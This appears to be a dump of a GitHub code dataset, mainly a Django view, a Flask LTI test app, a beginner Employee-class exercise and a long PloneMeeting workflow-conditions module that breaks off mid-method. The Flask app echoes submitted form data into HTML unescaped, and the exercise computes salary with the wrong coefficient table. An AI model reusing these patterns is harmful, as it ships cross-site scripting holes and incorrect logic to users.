kwargs['request_data']\n question_id = kwargs['question_id']\n test_case_storage = TestCaseStorageImplementation()\n presenter = PresenterImplementation()\n question_storage = QuestionStorageImplementation()\n interactor = CreateTestCaseInteractor(\n test_case_storage=test_case_storage,\n presenter=presenter,\n question_storage=question_storage\n )\n response = interactor.create_test_case(\n question_id=question_id, test_case_details=test_case_details\n )\n json_response = json.dumps(response)\n return HttpResponse(json_response, status=201)","repo_name":"bammidichandini/content_management_portal","sub_path":"content_management_portal/views/create_coding_question_test_case/api_wrapper.py","file_name":"api_wrapper.py","file_ext":"py","file_size_in_byte":1344,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"36029717820","text":"from flask import Flask\nfrom flask import request\n\nimport logging\n\nimport xml_templates\n\n# If `entrypoint` is not defined in app.yaml, App Engine will look for an app\n# called `app` in `main.py`.\napp = Flask(__name__)\n\n\n@app.route('/', methods=['GET', 'POST'])\ndef hello():\n print(f\"Received a request: {request.form}, {request.args}\")\n if \"lis_person_name_full\" in request.form:\n return_string = f\"

    Hello {request.form['lis_person_name_full']}!

    Data sent:

    \"\n for k, v in request.form.items():\n return_string += f\"{k}: {v}
    \"\n return return_string + \"

    \"\n return \"

    Well, hello..?

    \"\n\n\n@app.route('/lti', methods=['GET', 'POST'])\ndef lti():\n print(f\"Received a request: {request.form}, {request.args}\")\n return xml_templates.get_xml_config()\n\n\nif __name__ == '__main__':\n # This is used when running locally only. When deploying to Google App\n # Engine, a webserver process such as Gunicorn will serve the app. This\n # can be configured by adding an `entrypoint` to app.yaml.\n app.run(host='127.0.0.1', port=8080, debug=True)\n","repo_name":"autocheck-thesis/lti-provider","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1121,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"5916682214","text":"'''Write a class Employee with name, age, job attributes, experience.\n Add method which calculates salary: basic_salary*(experience + job_coefficient)\n\nAdd method which calculates max experience valid for the job \nmax_experience is reached when JOB_EFFICIENCE_COEF < current salary\nand method which return if employee over experienced for the job'''\n\nclass Employee:\n\n BASIC_SALARY = 100\n\n JOB_SALARY_COEF = {\n 'developer': 1.5,\n 'devops': 2,\n 'admin': 1.25,\n 'pm': 2.5 }\n\n JOB_EFFICIENCE_COEF = {\n 'developer': 1500,\n 'devops': 2000,\n 'admin': 800,\n 'pm': 2100 }\n\n def __init__(self, name, age, job_attributes, experience):\n self.name = name\n self.age = age\n self.job_attributes = job_attributes\n self.experience = experience\n \n def calculate_salary(self):\n salary = self.BASIC_SALARY*(self.experience + self.JOB_EFFICIENCE_COEF[self.job_attributes])\n return salary\n\n def calculate_max_experience(self):\n\n if self.JOB_EFFICIENCE_COEF[self.job_attributes] < self.calculate_salary():\n return self.experience\n\n\nemployee1 = Employee(\"Bob\", 43, \"pm\", 60000)\n\nprint(employee1.calculate_max_experience())","repo_name":"marinasupernova/its_my_py","sub_path":"module4/task3.py","file_name":"task3.py","file_ext":"py","file_size_in_byte":1203,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"27705787116","text":"# -*- coding: utf-8 -*-\n\nfrom AccessControl import ClassSecurityInfo\nfrom AccessControl import Unauthorized\nfrom AccessControl.PermissionRole import rolesForPermissionOn\nfrom Acquisition import aq_base\nfrom App.class_init import InitializeClass\nfrom appy.gen import No\nfrom archetypes.referencebrowserwidget.widget import ReferenceBrowserWidget\nfrom collections import OrderedDict\nfrom collective.behavior.talcondition.utils import _evaluateExpression\nfrom collective.contact.plonegroup.utils import get_all_suffixes\nfrom collective.contact.plonegroup.utils import get_organization\nfrom collective.contact.plonegroup.utils import get_plone_group_id\nfrom collective.iconifiedcategory.interfaces import IIconifiedInfos\nfrom copy import deepcopy\nfrom datetime import datetime\nfrom DateTime import DateTime\nfrom imio.actionspanel.utils import unrestrictedRemoveGivenObject\nfrom imio.helpers.cache import get_cachekey_volatile\nfrom imio.helpers.cache import get_current_user_id\nfrom imio.helpers.cache import get_plone_groups_for_user\nfrom imio.helpers.content import get_vocab\nfrom imio.helpers.content import get_vocab_values\nfrom imio.helpers.content import safe_delattr\nfrom imio.helpers.content import safe_encode\nfrom imio.helpers.content import uuidsToObjects\nfrom imio.helpers.content import uuidToCatalogBrain\nfrom imio.helpers.content import uuidToObject\nfrom imio.helpers.security import fplog\nfrom imio.helpers.workflow import do_transitions\nfrom imio.helpers.workflow import get_transitions\nfrom imio.helpers.xhtml import is_html\nfrom imio.history.utils import get_all_history_attr\nfrom imio.history.utils import getLastWFAction\nfrom imio.prettylink.interfaces import IPrettyLink\nfrom natsort import humansorted\nfrom OFS.ObjectManager import BeforeDeleteException\nfrom persistent.list import PersistentList\nfrom persistent.mapping import PersistentMapping\nfrom plone import api\nfrom plone.memoize import ram\nfrom Products.Archetypes.atapi import BaseFolder\nfrom Products.Archetypes.atapi import BooleanField\nfrom Products.Archetypes.atapi import DateTimeField\nfrom Products.Archetypes.atapi import DisplayList\nfrom Products.Archetypes.atapi import IntegerField\nfrom Products.Archetypes.atapi import LinesField\nfrom Products.Archetypes.atapi import MultiSelectionWidget\nfrom Products.Archetypes.atapi import OrderedBaseFolder\nfrom Products.Archetypes.atapi import OrderedBaseFolderSchema\nfrom Products.Archetypes.atapi import ReferenceField\nfrom Products.Archetypes.atapi import registerType\nfrom Products.Archetypes.atapi import RichWidget\nfrom Products.Archetypes.atapi import Schema\nfrom Products.Archetypes.atapi import SelectionWidget\nfrom Products.Archetypes.atapi import StringField\nfrom Products.Archetypes.atapi import StringWidget\nfrom Products.Archetypes.atapi import TextAreaWidget\nfrom Products.Archetypes.atapi import TextField\nfrom Products.CMFCore.permissions import ManagePortal\nfrom Products.CMFCore.permissions import ModifyPortalContent\nfrom Products.CMFCore.permissions import ReviewPortalContent\nfrom Products.CMFCore.permissions import View\nfrom Products.CMFCore.utils import _checkPermission\nfrom Products.CMFCore.WorkflowCore import WorkflowException\nfrom Products.CMFDynamicViewFTI.browserdefault import BrowserDefaultMixin\nfrom Products.CMFPlone.utils import safe_unicode\nfrom Products.PloneMeeting.browser.itemvotes import next_vote_is_linked\nfrom Products.PloneMeeting.config import AddAdvice\nfrom Products.PloneMeeting.config import AUTO_COPY_GROUP_PREFIX\nfrom Products.PloneMeeting.config import BUDGETIMPACTEDITORS_GROUP_SUFFIX\nfrom Products.PloneMeeting.config import CONSIDERED_NOT_GIVEN_ADVICE_VALUE\nfrom Products.PloneMeeting.config import DEFAULT_COPIED_FIELDS\nfrom Products.PloneMeeting.config import DUPLICATE_AND_KEEP_LINK_EVENT_ACTION\nfrom Products.PloneMeeting.config import DUPLICATE_EVENT_ACTION\nfrom Products.PloneMeeting.config import EXTRA_COPIED_FIELDS_FROM_ITEM_TEMPLATE\nfrom Products.PloneMeeting.config import EXTRA_COPIED_FIELDS_SAME_MC\nfrom Products.PloneMeeting.config import HIDDEN_DURING_REDACTION_ADVICE_VALUE\nfrom Products.PloneMeeting.config import HIDE_DECISION_UNDER_WRITING_MSG\nfrom Products.PloneMeeting.config import INSERTING_ON_ITEM_DECISION_FIRST_WORDS_NB\nfrom Products.PloneMeeting.config import ITEM_COMPLETENESS_ASKERS\nfrom Products.PloneMeeting.config import ITEM_COMPLETENESS_EVALUATORS\nfrom Products.PloneMeeting.config import ITEM_NO_PREFERRED_MEETING_VALUE\nfrom Products.PloneMeeting.config import MEETINGMANAGERS_GROUP_SUFFIX\nfrom Products.PloneMeeting.config import NO_COMMITTEE\nfrom Products.PloneMeeting.config import NO_TRIGGER_WF_TRANSITION_UNTIL\nfrom Products.PloneMeeting.config import NOT_ENCODED_VOTE_VALUE\nfrom Products.PloneMeeting.config import NOT_GIVEN_ADVICE_VALUE\nfrom Products.PloneMeeting.config import NOT_VOTABLE_LINKED_TO_VALUE\nfrom Products.PloneMeeting.config import PMMessageFactory as _\nfrom Products.PloneMeeting.config import PROJECTNAME\nfrom Products.PloneMeeting.config import ReadBudgetInfos\nfrom Products.PloneMeeting.config import READER_USECASES\nfrom Products.PloneMeeting.config import REINDEX_NEEDED_MARKER\nfrom Products.PloneMeeting.config import SENT_TO_OTHER_MC_ANNOTATION_BASE_KEY\nfrom Products.PloneMeeting.config import WriteBudgetInfos\nfrom Products.PloneMeeting.config import WriteCommitteeFields\nfrom Products.PloneMeeting.config import WriteDecision\nfrom Products.PloneMeeting.config import WriteInternalNotes\nfrom Products.PloneMeeting.config import WriteItemMeetingManagerFields\nfrom Products.PloneMeeting.config import WriteMarginalNotes\nfrom Products.PloneMeeting.content.meeting import Meeting\nfrom Products.PloneMeeting.events import item_added_or_initialized\nfrom Products.PloneMeeting.interfaces import IMeetingItem\nfrom Products.PloneMeeting.interfaces import IMeetingItemWorkflowActions\nfrom Products.PloneMeeting.interfaces import IMeetingItemWorkflowConditions\nfrom Products.PloneMeeting.model.adaptations import get_waiting_advices_infos\nfrom Products.PloneMeeting.model.adaptations import RETURN_TO_PROPOSING_GROUP_MAPPINGS\nfrom Products.PloneMeeting.utils import _addManagedPermissions\nfrom Products.PloneMeeting.utils import _base_extra_expr_ctx\nfrom Products.PloneMeeting.utils import _clear_local_roles\nfrom Products.PloneMeeting.utils import _get_category\nfrom Products.PloneMeeting.utils import _storedItemNumber_to_itemNumber\nfrom Products.PloneMeeting.utils import add_wf_history_action\nfrom Products.PloneMeeting.utils import addDataChange\nfrom Products.PloneMeeting.utils import AdvicesUpdatedEvent\nfrom Products.PloneMeeting.utils import checkMayQuickEdit\nfrom Products.PloneMeeting.utils import cleanMemoize\nfrom Products.PloneMeeting.utils import compute_item_roles_to_assign_to_suffixes\nfrom Products.PloneMeeting.utils import decodeDelayAwareId\nfrom Products.PloneMeeting.utils import down_or_up_wf\nfrom Products.PloneMeeting.utils import escape\nfrom Products.PloneMeeting.utils import fieldIsEmpty\nfrom Products.PloneMeeting.utils import forceHTMLContentTypeForEmptyRichFields\nfrom Products.PloneMeeting.utils import get_states_before\nfrom Products.PloneMeeting.utils import getCurrentMeetingObject\nfrom Products.PloneMeeting.utils import getCustomAdapter\nfrom Products.PloneMeeting.utils import getFieldVersion\nfrom Products.PloneMeeting.utils import getWorkflowAdapter\nfrom Products.PloneMeeting.utils import hasHistory\nfrom Products.PloneMeeting.utils import is_editing\nfrom Products.PloneMeeting.utils import ItemDuplicatedEvent\nfrom Products.PloneMeeting.utils import ItemDuplicatedToOtherMCEvent\nfrom Products.PloneMeeting.utils import ItemLocalRolesUpdatedEvent\nfrom Products.PloneMeeting.utils import networkdays\nfrom Products.PloneMeeting.utils import normalize\nfrom Products.PloneMeeting.utils import notifyModifiedAndReindex\nfrom Products.PloneMeeting.utils import reindex_object\nfrom Products.PloneMeeting.utils import rememberPreviousData\nfrom Products.PloneMeeting.utils import sendMail\nfrom Products.PloneMeeting.utils import sendMailIfRelevant\nfrom Products.PloneMeeting.utils import set_field_from_ajax\nfrom Products.PloneMeeting.utils import transformAllRichTextFields\nfrom Products.PloneMeeting.utils import translate_list\nfrom Products.PloneMeeting.utils import updateAnnexesAccess\nfrom Products.PloneMeeting.utils import validate_item_assembly_value\nfrom Products.PloneMeeting.utils import workday\nfrom Products.PloneMeeting.widgets.pm_textarea import render_textarea\nfrom zope.annotation.interfaces import IAnnotations\nfrom zope.component import getAdapter\nfrom zope.component import getMultiAdapter\nfrom zope.component import queryUtility\nfrom zope.event import notify\nfrom zope.i18n import translate\nfrom zope.interface import implements\nfrom zope.schema.interfaces import IVocabularyFactory\n\nimport html\nimport itertools\nimport logging\n\n\nlogger = logging.getLogger('PloneMeeting')\n\n# PloneMeetingError-related constants -----------------------------------------\nITEM_REF_ERROR = 'There was an error in the TAL expression for defining the ' \\\n 'format of an item reference. Please check this in your meeting config. ' \\\n 'Original exception: %s'\nAUTOMATIC_ADVICE_CONDITION_ERROR = \"There was an error in the TAL expression '{0}' \" \\\n \"defining if the advice of the group must be automatically asked for '{1}'. \" \\\n \"Original exception : {2}\"\nADVICE_AVAILABLE_ON_CONDITION_ERROR = \"There was an error in the TAL expression \" \\\n \"'{0} defined in the \\'Available on\\' column of the MeetingConfig.customAdvisers \" \\\n \"evaluated on {1}. Original exception : {2}\"\nAS_COPYGROUP_CONDITION_ERROR = \"There was an error in the TAL expression '{0}' \" \\\n \"defining if the a group must be set as copyGroup for item at '{1}'. \" \\\n \"Original exception : {2}\"\nAS_COPYGROUP_RES_ERROR = \"While setting automatically added copyGroups, the Plone group suffix '{0}' \" \\\n \"returned by the expression on organization '{1}' does not exist.\"\nWRONG_TRANSITION = 'Transition \"%s\" is inappropriate for adding recurring ' \\\n 'items.'\nREC_ITEM_ERROR = 'There was an error while trying to generate recurring ' \\\n 'item with id \"%s\". Unable to trigger transition \"%s\". Original error message is \"%s\".'\nBEFOREDELETE_ERROR = 'A BeforeDeleteException was raised by \"%s\" while ' \\\n 'trying to delete an item with id \"%s\"'\nWRONG_ADVICE_TYPE_ERROR = 'The given adviceType \"%s\" does not exist!'\nINSERT_ITEM_ERROR = 'There was an error when inserting the item, ' \\\n 'please contact system administrator!'\n\n\nclass MeetingItemWorkflowConditions(object):\n '''Adapts a MeetingItem to interface IMeetingItemWorkflowConditions.'''\n implements(IMeetingItemWorkflowConditions)\n security = ClassSecurityInfo()\n\n def __init__(self, item):\n self.context = item\n self.tool = api.portal.get_tool('portal_plonemeeting')\n self.cfg = self.tool.getMeetingConfig(self.context)\n self.review_state = self.context.query_state()\n\n def _publishedObjectIsMeeting(self):\n '''Is the object currently published in Plone a Meeting ?'''\n obj = getCurrentMeetingObject(self.context)\n return isinstance(obj, Meeting)\n\n def _getLastValidationState_cachekey(method, self, before_last=False, return_level=False):\n '''cachekey method for self._getLastValidationState.'''\n return self.context.getProposingGroup(), before_last, return_level\n\n # not ramcached perf tests says it does not change much\n # and this avoid useless entry in cache\n # @ram.cache(_getLastValidationState_cachekey)\n def _getLastValidationState(self, before_last=False, return_level=False):\n '''Last validation state is validation level state defined in\n MeetingConfig.itemWFValidationLevels for which the linked\n suffixed Plone group is not empty.\n If p_before_last=True, then we return before_last level.\n If p_return_level=True we return the last validation state and\n the full validation level from cfg.getItemWFValidationLevels.'''\n levels = list(self.cfg.getItemWFValidationLevels(only_enabled=True))\n res = 'itemcreated'\n # get suffixed Plone group in reverse order of defined validation levels\n levels.reverse()\n found_last = False\n found_before_last = False\n level = {}\n for level in levels:\n if self.tool.group_is_not_empty(self.context.getProposingGroup(), level['suffix']):\n res = level['state']\n if found_last:\n found_before_last = True\n else:\n found_last = True\n if (found_last and not before_last) or found_before_last:\n break\n if return_level:\n return res, level\n else:\n return res\n\n def _check_required_data(self, destination_state):\n '''Make sure required data are encoded when necessary.'''\n msg = None\n # 2 cases, either transitions are triggered automatically, it is the case\n # when item created by WS or when sent to another MC and transitions triggered,\n # in this case we only validate the 'present' transition\n # or we are using the UI (actionspanel), in this case, we validate every transitions\n if destination_state == 'presented' or \\\n ('imio.actionspanel_portal_cachekey' in self.context.REQUEST and\n not self.context.REQUEST.get('disable_check_required_data')):\n if self.context.attribute_is_used(\"category\") and \\\n not self.context.getCategory(theObject=True):\n msg = No(_('required_category_ko'))\n elif self.context.attribute_is_used('classifier') and not self.context.getClassifier():\n msg = No(_('required_classifier_ko'))\n elif (self.context.attribute_is_used('proposingGroupWithGroupInCharge') or\n self.context.attribute_is_used('groupsInCharge')) and \\\n not self.context.getGroupsInCharge():\n msg = No(_('required_groupsInCharge_ko'))\n return msg\n\n def _mayShortcutToValidationLevel(self, destinationState):\n '''When using WFAdaptation 'item_validation_shortcuts',\n is current user able to use the shortcut to p_destinationState?'''\n res = False\n if 'item_validation_shortcuts' in self.cfg.getWorkflowAdaptations():\n # get previous item validation state and check what suffixes may manage\n item_val_levels_states = self.cfg.getItemWFValidationLevels(\n data='state', only_enabled=True)\n previous_val_state = item_val_levels_states[\n item_val_levels_states.index(destinationState) - 1]\n previous_suffixes = self.cfg.getItemWFValidationLevels(\n states=[previous_val_state], data='extra_suffixes', only_enabled=True)\n previous_main_suffix = self.cfg.getItemWFValidationLevels(\n states=[previous_val_state], data='suffix', only_enabled=True)\n previous_suffixes.append(previous_main_suffix)\n previous_suffixes = tuple(set(previous_suffixes))\n previous_group_managing_item_uid = self.context.adapted()._getGroupManagingItem(\n previous_val_state)\n res = bool(self.tool.get_filtered_plone_groups_for_user(\n org_uids=[previous_group_managing_item_uid], suffixes=previous_suffixes))\n # when previous_val_state group suffix is empty, we replay _mayShortcutToValidationLevel\n # but with this previous state as destinationState\n # XXX TO BE CONFIRMED\n if not res and not self.tool.group_is_not_empty(\n previous_group_managing_item_uid, previous_main_suffix):\n return self._mayShortcutToValidationLevel(previous_val_state)\n else:\n res = True\n return res\n\n security.declarePublic('mayProposeToNextValidationLevel')\n\n def mayProposeToNextValidationLevel(self, destinationState):\n '''Check if able to propose to next validation level.'''\n res = False\n if _checkPermission(ReviewPortalContent, self.context):\n suffix = self.cfg.getItemWFValidationLevels(\n states=[destinationState], data='suffix', only_enabled=True)\n group_managing_item_uid = self.context.adapted()._getGroupManagingItem(destinationState)\n # check if next validation level suffixed Plone group is not empty\n res = self.tool.group_is_not_empty(group_managing_item_uid, suffix)\n # shortcuts are available to (Meeting)Managers\n if res and not self.tool.isManager(self.cfg):\n # check that when using shortcuts, this is available\n res = self._mayShortcutToValidationLevel(destinationState)\n # check required data only if transition is doable or we would display\n # a No button for a transition that is actually not triggerable...\n if res:\n msg = self._check_required_data(destinationState)\n if msg is not None:\n res = msg\n return res\n\n def _has_waiting_advices_transitions(self):\n '''Are there 'wait_advices_' transitions from current state and\n are there advices to wait, aka the transition would be available?'''\n res = False\n if 'waiting_advices_given_advices_required_to_validate' in \\\n self.cfg.getWorkflowAdaptations():\n wf_tool = api.portal.get_tool('portal_workflow')\n item_wf = wf_tool.getWorkflowsFor(self.context)[0]\n transitions = item_wf.states[self.review_state].transitions\n wait_advices_transitions = [tr for tr in transitions\n if tr.startswith('wait_advices_')]\n for wait_advices_tr in wait_advices_transitions:\n if self._hasAdvicesToGive(item_wf.transitions[wait_advices_tr].new_state_id):\n res = True\n break\n return res\n\n def _get_waiting_advices_icon_advisers(self):\n '''To be overrided, return adviser ids for which the waiting_advices icon\n color must be computed.'''\n return []\n\n def get_waiting_advices_icon_infos(self):\n '''Return advice for which the waiting_advices icon (pretty link)\n must be managed (red/green/blue).\n If some _get_waiting_advices_icon_advisers, check if one of these advice\n is giveable in current state, if it is the case, then compute icon color.\n Return icon name and translation msgid.'''\n res = 'wait_advices_from.png', translate(\n self.review_state, domain=\"plone\", context=self.context.REQUEST)\n for adviser_uid in self._get_waiting_advices_icon_advisers():\n if adviser_uid in self.context.adviceIndex and \\\n self.context.adviceIndex[adviser_uid]['advice_editable']:\n # check if advice is up or down WF\n advice_obj = self.context.getAdviceObj(adviser_uid)\n down_or_up = down_or_up_wf(advice_obj)\n if down_or_up:\n res = 'wait_advices_{0}_from.png'.format(down_or_up), \\\n translate('icon_help_waiting_advices_{0}'.format(down_or_up),\n domain=\"PloneMeeting\",\n context=self.context.REQUEST)\n return res\n\n security.declarePublic('mayValidate')\n\n def mayValidate(self):\n '''May validate if having ReviewPortalContent and being last item validation level.'''\n res = False\n if _checkPermission(ReviewPortalContent, self.context):\n # bypass for Manager, works with adopt_roles\n if _checkPermission(ManagePortal, self.context):\n res = True\n else:\n # user may validate if he is member of the last validation level suffixed group\n last_validation_state, last_level = self._getLastValidationState(return_level=True)\n if self.review_state == last_validation_state or \\\n ('item_validation_shortcuts' in self.cfg.getWorkflowAdaptations() and\n 'item_validation_no_validate_shortcuts' not in self.cfg.getWorkflowAdaptations() and\n get_plone_group_id(\n self.context.getProposingGroup(),\n last_level['suffix']) in get_plone_groups_for_user()):\n res = True\n if self._has_waiting_advices_transitions():\n res = No(_('has_required_waiting_advices'))\n if res:\n msg = self._check_required_data('validated')\n if msg is not None:\n res = msg\n return res\n\n security.declarePublic('mayPresent')\n\n def mayPresent(self):\n ''' '''\n # only MeetingManagers may present an item, the 'Review portal content'\n # permission is not enough as MeetingReviewer may have the 'Review portal content'\n # when using the 'reviewers_take_back_validated_item' wfAdaptation\n if not self.tool.isManager(self.cfg):\n return False\n\n # if item initial_state is \"validated\", an item could miss it's category\n msg = self._check_required_data('presented')\n if msg is not None:\n return msg\n\n # We may present the item if Plone currently publishes a meeting.\n # Indeed, an item may only be presented within a meeting.\n # if we are not on a meeting, try to get the next meeting accepting items\n if not self._publishedObjectIsMeeting():\n meeting = self.context.getMeetingToInsertIntoWhenNoCurrentMeetingObject()\n if not meeting:\n return No(_('not_able_to_find_meeting_to_present_item_into'))\n\n # here we are sure that we have a meeting that will accept the item\n # Verify if all automatic advices have been given on this item.\n if self.context.enforceAdviceMandatoriness() and \\\n not self.context.mandatoryAdvicesAreOk():\n return No(_('mandatory_advice_ko'))\n\n # all checks passed\n return True\n\n security.declarePublic('mayDecide')\n\n def mayDecide(self):\n '''May this item be \"decided\" ?'''\n res = False\n if _checkPermission(ReviewPortalContent, self.context) and \\\n self.context.hasMeeting():\n meeting = self.context.getMeeting()\n if meeting.date < datetime.now():\n if not self.context.fieldIsEmpty('decision') or not \\\n self.context.fieldIsEmpty('motivation'):\n res = True\n else:\n itemNumber = self.context.getItemNumber(relativeTo='meeting',\n for_display=True)\n res = No(_('decision_is_empty',\n mapping={'itemNumber': itemNumber}))\n return res\n\n def _userIsPGMemberAbleToSendItemBack(self, proposing_group_uid, destinationState):\n ''' '''\n suffix = self.cfg.getItemWFValidationLevels(\n states=[destinationState], data='suffix')\n # first case, is user member of destinationState level?\n res = self.tool.group_is_not_empty(\n proposing_group_uid, suffix, user_id=get_current_user_id(self.context.REQUEST))\n # in case we use shortcuts, we also check if able to go to destinationState\n # if it was the classic item validation workflow\n # so a creator could send back to \"itemcreated\" and to \"proposed\"\n if not res and \\\n self.tool.group_is_not_empty(proposing_group_uid, suffix) and \\\n 'item_validation_shortcuts' in self.cfg.getWorkflowAdaptations():\n res = self._mayShortcutToValidationLevel(destinationState)\n\n return res and \\\n self._userIsPGMemberAbleToSendItemBackExtraCondition(\n proposing_group_uid, destinationState)\n\n def _userIsPGMemberAbleToSendItemBackExtraCondition(\n self, proposingGroup, destinationState):\n ''' '''\n return True\n\n def _adviceSendableBackOnlyWhenNoMoreEditable(self, org_uid):\n '''Depending on advice WF, advice may be sendable back by adviser\n only when advice no more editable.\n By default this is not the case as default advice WF as only one\n state in which advice is always editable.'''\n return False\n\n def _currentUserIsAdviserAbleToSendItemBack(self, destinationState):\n '''Is current user an adviser able to send an item 'waiting_advices' back to other states?\n To do so :\n - every advices that should be given have to be given;\n - user must be adviser for advice;\n - if advice not given, user must be able to evaluate completeness and item must be incomplete.'''\n user_plone_groups = get_plone_groups_for_user()\n res = False\n for org_uid in self.context.adviceIndex:\n # org can give advice in current state and member is adviser for it\n # user able to evaluate completeness and item complete or\n # not able to evaluate completeness but completeness evaluation not required\n # but advice not editable, this means also advice still not added\n # this last case is \"not using completeness\"\n adapted = self.context.adapted()\n may_eval_completeness = adapted.mayEvaluateCompleteness()\n if self.review_state in self.cfg.getItemAdviceStatesForOrg(org_uid) and \\\n get_plone_group_id(org_uid, 'advisers') in user_plone_groups and \\\n (self.context._advice_is_given(org_uid) or\n (may_eval_completeness and\n not adapted._is_complete()) or\n (not may_eval_completeness and\n self.context.getCompleteness() in ['completeness_evaluation_not_required',\n 'completeness_not_yet_evaluated']) and\n (not self._adviceSendableBackOnlyWhenNoMoreEditable(org_uid) or\n not self.context.adviceIndex[org_uid]['advice_editable'])) and \\\n self._currentUserIsAdviserAbleToSendItemBackExtraCondition(org_uid, destinationState):\n res = True\n break\n return res\n\n def _currentUserIsAdviserAbleToSendItemBackExtraCondition(self, org_uid, destinationState):\n ''' '''\n return True\n\n security.declarePublic('mayCorrect')\n\n def mayCorrect(self, destinationState=None):\n '''See doc in interfaces.py.'''\n res = False\n meeting = self.context.getMeeting()\n if not meeting or (meeting and meeting.query_state() != 'closed'):\n proposingGroup = self.context.getProposingGroup()\n # when item is validated, we may eventually send back to last validation state\n wfas = self.cfg.getWorkflowAdaptations()\n last_val_state, last_level = self._getLastValidationState(return_level=True)\n if self.review_state == 'validated' and destinationState == last_val_state:\n # MeetingManager probably\n if _checkPermission(ReviewPortalContent, self.context):\n res = True\n # manage the reviewers_take_back_validated_item WFAdaptation\n elif 'reviewers_take_back_validated_item' in self.cfg.getWorkflowAdaptations():\n # is current user member of last validation level?\n res = self.tool.group_is_not_empty(\n proposingGroup, last_level['suffix'], user_id=get_current_user_id())\n # using 'waiting_advices_XXX_send_back' WFAdaptations,\n elif self.review_state.endswith('_waiting_advices'):\n item_validation_states = self.cfg.getItemWFValidationLevels(data='state', only_enabled=True)\n # compute sendable back states\n sendable_back_states = []\n # when using from last/before last validation level, able to send back to last level\n if 'waiting_advices_from_before_last_val_level' in wfas:\n sendable_back_states.append(self._getLastValidationState(before_last=True))\n if 'waiting_advices_from_last_val_level' in wfas:\n sendable_back_states.append(last_val_state)\n if 'waiting_advices_from_every_val_levels' in wfas:\n sendable_back_states = list(item_validation_states)\n if not sendable_back_states:\n # use custom values from WAITING_ADVICES_FROM_STATES\n for waiting_advice_config in get_waiting_advices_infos(self.cfg.getId()):\n sendable_back_states += list(waiting_advice_config['back_states'])\n\n # remove duplicates\n sendable_back_states = list(set(sendable_back_states))\n if destinationState in sendable_back_states or \\\n destinationState not in item_validation_states:\n # bypass for Manager, do not check on ReviewPortalContent\n # as also given to proposingGroup\n if self.tool.isManager(self.cfg):\n res = True\n else:\n # is current user proposingGroup member able to trigger transition?\n if 'waiting_advices_proposing_group_send_back' in wfas:\n res = self._userIsPGMemberAbleToSendItemBack(\n proposingGroup, destinationState)\n # if not, maybe it is an adviser able to give an advice?\n if not res and 'waiting_advices_adviser_send_back' in wfas:\n # adviser may send back to validated when using\n # 'waiting_advices_adviser_may_validate'\n if 'waiting_advices_adviser_may_validate' in wfas:\n sendable_back_states.append('validated')\n # is current user adviser able to trigger transition?\n res = self._currentUserIsAdviserAbleToSendItemBack(destinationState)\n else:\n # maybe destinationState is a validation state?\n # in this case return True only if group not empty\n suffix = self.cfg.getItemWFValidationLevels(\n states=[destinationState], data='suffix')\n res = _checkPermission(ReviewPortalContent, self.context) and \\\n (not suffix or self.tool.group_is_not_empty(proposingGroup, suffix))\n return res\n\n security.declarePublic('mayBackToMeeting')\n\n def mayBackToMeeting(self, transitionName):\n \"\"\"Specific guard for the 'return_to_proposing_group' wfAdaptation.\n As we have only one guard_expr for potentially several transitions departing\n from the 'returned_to_proposing_group' state, we receive the p_transitionName.\"\"\"\n if not _checkPermission(ReviewPortalContent, self.context) and not \\\n self.tool.isManager(self.cfg):\n return\n # when using validation states, may return when in last validation state\n if 'return_to_proposing_group' not in self.cfg.getWorkflowAdaptations():\n current_validation_state = 'itemcreated' \\\n if self.review_state == 'returned_to_proposing_group' \\\n else self.review_state.replace('returned_to_proposing_group_', '')\n last_val_state = self._getLastValidationState()\n # we are in last validation state, or we are in state 'returned_to_proposing_group'\n # and there is no last validation state, aka it is \"itemcreated\"\n if current_validation_state != last_val_state:\n return\n\n # get the linked meeting\n meeting = self.context.getMeeting()\n meetingState = meeting.query_state()\n # use RETURN_TO_PROPOSING_GROUP_MAPPINGS to know in which meetingStates\n # the given p_transitionName can be triggered\n authorizedMeetingStates = RETURN_TO_PROPOSING_GROUP_MAPPINGS[transitionName]\n # special behavior when using WFA 'itemdecided', back to itemfrozen\n # may only be done if meeting in state 'frozen'\n if 'itemdecided' in self.cfg.getWorkflowAdaptations() and \\\n transitionName == 'backTo_itemfrozen_from_returned_to_proposing_group':\n authorizedMeetingStates = ['frozen']\n if meetingState in authorizedMeetingStates:\n return True\n # if we did not return True, then return a No(...) message specifying that\n # it can no more be returned to the meeting because the meeting is in some\n # specific states (like 'closed' for example)\n if meetingState in RETURN_TO_PROPOSING_GROUP_MAPPINGS['NO_MORE_RETURNABLE_STATES']:\n # avoid to display No(...) message for each transition having the 'mayBackToMeeting'\n # guard expr, just return the No(...) msg for the first transitionName checking this...\n if 'may_not_back_to_meeting_warned_by' not in self.context.REQUEST:\n self.context.REQUEST.set('may_not_back_to_meeting_warned_by', transitionName)\n if self.context.REQUEST.get('may_not_back_to_meeting_warned_by') == transitionName:\n return No(_('can_not_return_to_meeting_because_of_meeting_state',\n mapping={'meetingState': translate(\n meetingState,\n domain='plone',\n context=self.context.REQUEST)}))\n return False\n\n security.declarePublic('mayFreeze')\n\n def mayFreeze(self):\n res = False\n if _checkPermission(ReviewPortalContent, self.context):\n meeting = self.context.getMeeting()\n if meeting and meeting.query_state() not in get_states_before(meeting, 'frozen'):\n res = True\n return res\n\n security.declarePublic('mayPublish')\n\n def mayPublish(self):\n res = False\n if _checkPermission(ReviewPortalContent, self.context):\n meeting = self.context.getMeeting()\n if meeting.query_state() not in get_states_before(meeting, 'published'):\n res = True\n return res\n\n security.declarePublic('mayItemDecide')\n\n def mayItemDecide(self):\n res = False\n if _checkPermission(ReviewPortalContent, self.context):\n meeting = self.context.getMeeting()\n if meeting.query_state() not in get_states_before(meeting, 'decided'):\n res = True\n return res\n\n security.declarePublic('mayReturnToProposingGroup')\n\n def mayReturnToProposingGroup(self):\n res = False\n if _checkPermission(ReviewPortalContent, self.context):\n res = True\n return res\n\n security.declarePublic('isLateFor')\n\n def isLateFor(self, meeting):\n '''See doc in interfaces.py.'''\n if meeting:\n preferred_meeting = self.context.getPreferredMeeting(theObject=True)\n if preferred_meeting and \\\n meeting.is_late() and \\\n meeting.date >= preferred_meeting.date:\n return True\n return False\n\n def _advice_is_to_give(self, adviceInfo):\n \"\"\" \"\"\"\n res 